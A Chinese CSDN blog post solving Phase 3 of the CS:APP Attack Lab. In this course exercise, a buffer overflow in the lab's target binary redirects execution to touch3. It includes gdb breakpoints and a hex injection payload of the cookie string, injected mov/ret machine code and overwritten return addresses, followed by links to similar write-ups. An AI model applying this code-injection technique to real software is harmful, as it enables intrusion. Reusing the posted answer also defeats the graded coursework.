csapp attack lab phase3

已于 2023-12-10 22:16:56 修改
阅读量295 收藏
点赞数
分类专栏: C++ 面试题 笔试 文章标签: 汇编
于 2023-11-15 15:12:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876597/article/details/134417850
版权

csapp attack lab phase3

ctarget 会先调用test , test调用getbuf, getbuf调用Get。
在phase1, 里通过修改缓冲区,是getbuf函数执行ret之后,跳转到touch1, 和touch1 不同的地方在于 touch2 是有入参数的,入参数需要通过在缓冲区里增加对rdi的修改,进行赋值。同时也要ret 执行后,确保rsp指向的地址的内容是touch2函数地址。
和phase2 不同的地方在于 phase3 传递的参数是指针。

任务目的是通过缓冲区注入攻击,将函数getbuf返回直接重定向到函数touch3。

(gdb) b *0x401971
Breakpoint 1 at 0x401971: file visible.c, line 92.
(gdb) b *0x401976
Breakpoint 2 at 0x401976: file /usr/include/x86_64-linux-gnu/bits/stdio2.h, line 105.
(gdb) b *0x4017af
Breakpoint 3 at 0x4017af: file buf.c, line 14.
(gdb) b *0x4017b4
Breakpoint 4 at 0x4017b4: file buf.c, line 16.
(gdb) b *0x4017bd
Breakpoint 5 at 0x4017bd: file buf.c, line 16.

test 汇编代码:
在这里插入图片描述

在这里插入图片描述
getbuf汇编代码:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
touch3汇编代码:
在这里插入图片描述
在这里插入图片描述

参考答案:

35 39 62 39 39 37 66 61 00 /* "59b997fa" */
48 c7 c7 78 dc 61 55 /* mov */
c3 /* ret */
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 /* match buf */
81 dc 61 55 00 00 00 00 /* mov address */
fa 18 40 00 00 00 00 00 /* touch3 address */

通过将touch3函数覆盖test的stack frame, 在40个字符的范围内写入汇编代码,使寄存器执行mov等指令,并跳转到touch3。
mov指令不能直接修改rip寄存器的值。因为rip寄存器存储的是指令的地址,它是由处理器自动更新的。

my CSAPP Attack lab堆栈详解
业精于勤,荒于嬉
12-03 602
关注公号【逆向通信猿】更精彩!!! 这个实验时学习了简书上的一篇文章后,自己根据课程例子进行的一次小测试,phase 4和5的堆栈图解还没有画,等后续有时间会进行补充。
CSAPP-LAB3-Attack
Dallas01的博客
02-20 1595
文章目录00 PrerequisitePart 1: Code injection1.1 phase_11.2 phase_21.3 phase_3Part2: Returned-Oriented Programming2.1 phase_42.2 Phase_5 00 Prerequisite 听见课堂上老爷子说: But to be a good person you also know what the bet have to know what the bad people do, so part
深入理解计算机系统attack lab
热门推荐
peanWang的博客
05-26 4万+
Attack lab
计算机系统--实验三AttackLab实验
weixin_52363821的博客
12-16 7753
AttackLab实验
CSAPP Lab 3 Attack Lab phase1~3
辣鸡的博客
08-04 892
Lab 3 Attack lab phase 1 第一个很简单,只需要用x命令查看栈内容,定位到ret的返回位置,再用自己输入的缓冲区溢出数据覆盖就行了。计算好需要输入的字节长度,将touch1函数的首地址恰好覆盖原先的栈顶元素,这样ret就会返回到touch1函数,而不是返回到正常的test函数。 需要注意的是,由于转移目标地址输入到栈中是ascii码形式保存的,所以如果地址是一些难以输入的ascii码怎么办?官方给了一个转换小程序hex2raw,能够将两位16进制表示的ascii码转换成字符输入,这样就
Lab3 Attack Lab
weixin_47089544的博客
03-26 1822
CSAPP Attack Lab,缓冲区溢出实验,超详细解析。
3-Attack Lab
qq_38966867的博客
07-22 302
3-Attack Lab 1. level 1 利用栈溢出覆盖getbuf函数的返回地址 答案 前五行是正常写入buf的数据,第六行是touch1的地址0x4017c0,用于覆盖getbuf()函数的正常返回地址。注意写入的数据不能是0x0a,这个数字表述“\n”,Get()函数遇到0xa会终止。 2. level 2 注入可执行代码 那么如何让程序去执行我们的代码呢?既然我们可以向栈中写入任意内容并且可以设置返回时跳转到的地址,那么我们就可以通过在栈中写入指令,再令从getbuf函数返回的地址为我们栈
CSAPP-Lab03 Attack Lab 详细解析
qq_25591221的博客
03-05 1万+
目录实验概览Part 1: Code Injection AttacksPhase 1分析反汇编`test`反汇编`getbuf`SolutionPhase 2分析注入代码栈帧讲解SolutionPhase 3分析注入代码栈帧讲解SolutionPart 2: Return-Oriented ProgrammingPhase 4分析栈帧讲解SolutionPhase 5分析栈帧讲解Solution总结 纸上得来终觉浅,绝知此事要躬行 实验概览 Attack!,成为一名黑客不正是我小时候的梦想吗?这个实验
深入理解计算机系统 CSAPP 实验labAttack Lab
最新发布
apple_50569014的博客
08-12 446
学生将获得一对独特的自定义生成的x86-64二进制可执行文件,称为目标,它们有缓冲区溢出错误。另一个容易受到面向返回的编程攻击。学生被要求通过开发基于代码注入或面向返回的编程的漏洞来修改目标的行为。这个实验室向学生传授堆栈规则,并教他们编写容易受到缓冲区溢出攻击的代码的危险。如果你是一个自学的学生,这里有一对Ubuntu 12.4目标,你可以自己尝试。你需要使用“-q”选项运行你的目标,这样他们就不会试图联系一个不存在的评分服务器。如果你是一个拥有CS: APP账户的讲师,你可以在这里下载解决方案。
深入理解计算机系统(CSAPPattack-lab详解
独小雪的博客
07-30 2446
深入理解计算机系统(CSAPPattack-lab详解 下载实验用的程序戳这里 戳这里下载实验说明 开始 target1里的两个程序,ctraget和rtarget,都有缓冲区溢出的bug。实验要求我们做的,是利用这些bug,让程序通过缓冲区溢出,执行我们想执行的代码。下载的文件夹里,ctarget是做代码注入攻击 (code-injection attacks) 用的。rtarget,还有后面的cookie.txt、hex2raw、farm.c都和后面的ROP攻击(return-oriented-pr
attacklab笔记
bysoulwarden的博客
05-14 2046
做完attacklab记点什么,防止以后什么都不记得了。phase1-3用getbuf读取字符串,但不检测栈溢出,正常的gets()在返回前会call一个check函数,检查栈溢出。在lab里通过栈溢出顶掉返回地址,把返回地址变成栈的地址,inject代码到getbuf的栈里或到上层的栈里。在这个过程中明显感受到代码和栈和数据都是在一个地址空间里。phase4-5中增加了两种防止栈溢出的机制:1....
CSAPP AttackLab解题记录
静下心来做事
02-13 1191
作业地址: http://csapp.cs.cmu.edu/3e/labs.html AttackLab共5道题,Phase1~Phase3是缓冲区溢出(Buffer Overflow)攻击,Phase4~Phase5是返回导向(ROP:Return Oriented Programming)攻击。 各题解题思路: Phase1: 任务: 通过缓冲区溢出来修改函数getbuf的返回地址,使得getbuf返回之后跳转到函数touch1执行。 第一题,说详细一点。 ...
【逆向】【Attack Lab】漏洞攻击实验解说
ethan18的博客
06-13 1962
CSAPP译名为《深入理解计算机系统》,Attack Lab是这本书的第三个实验,关于前两个实验,可以在中找到,关于第二个实验【Bomb Lab】之前有篇已经写过了(不过好像对于Bomb lab的题目有点细微的不一样)我们的实验可以依照着官方给的进行参照,依照着这个文档直接开始。
CSAPP实验3Attack Lab
CD的博客
12-27 8961
CS:APP配套实验之3
CSAPPAttack Lab —— 缓冲区溢出攻击实验
-Silvia、
06-05 4万+
CSAPPAttack Lab —— 缓冲区溢出攻击实验 X86-64寄存器和栈帧 Part I:Code Injection Attacks Part II:Return-Oriented Programming Attacks
CSAPP Lab3:attacklab缓冲区溢出攻击实验
话歪之地的博客
11-07 2846
参考文章: http://wdxtub.com/2016/04/16/thick-csapp-lab-3/ http://blog.csdn.net/lijun538/article/details/50682387 http://blog.csdn.net/pessis1/article/details/52957696 实验文件,点此下载 实验答案: 请
深入理解操作系统实验——bomb lab(phase_3)
君陌的博客
11-24 2253
3、对phase_3破解 得到phase_3汇编代码,开始破解 sub $0x3c,%esp lea 0x28(%esp),%eax mov %eax,0x10(%esp) lea 0x2f(%esp),%eax mov %eax,0xc(%esp) lea 0x24(%esp),%eax mov %eax,0x8(%esp) movl $0x804...
CSAPP实验(三)——attacklab
haha123486的博客
05-21 6942
phase_1 使用objdump -d ctarget > ctarget.dis命令把可执行程序ctarget的反汇编代码保存到ctarget.dis文件里。再用vim打开ctarget.dis文件,从中得到下图。图中可知,函数touch1的起始地址在0x4017c0。 下图是getbuf的汇编代码,首先分配了40(0x28)个字节的栈空间。也就是说当输入字符串大于40个字节时会覆盖函数getbuf的返回地址。 建立exploit1.txt,具体内容如下图所示。需要注意的是采用小端字节排序。
深入理解计算机系统(3)——attack lab
学渣日记
05-08 2275
目录用到的指令第一部分:Code Injection Attacksphase 1phase 2phase 3第二部分:Return-Oriented Programming Attacksphase 4phase 5 用到的指令 名字 用途 ./hew2raw <1.txt> p1.txt 将攻击字符串转化为可读取格式 gcc -c 1.s 编译生成1.o文件 objdump -d 1.o(or ctarget)>1.txt 反汇编输出含机器码的语句 ./ct
CSAPP实验3:探索 Attack Lab 的实践技巧
#### CSAPP实验 Attack Lab 实验材料+实验报告 在实验材料中,学生将接触到实验的方方面面,包括: - 实验的规则和目标:了解实验的目的和完成任务的具体要求。 - 环境搭建:构建和配置安全的实验环境,确保实验在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值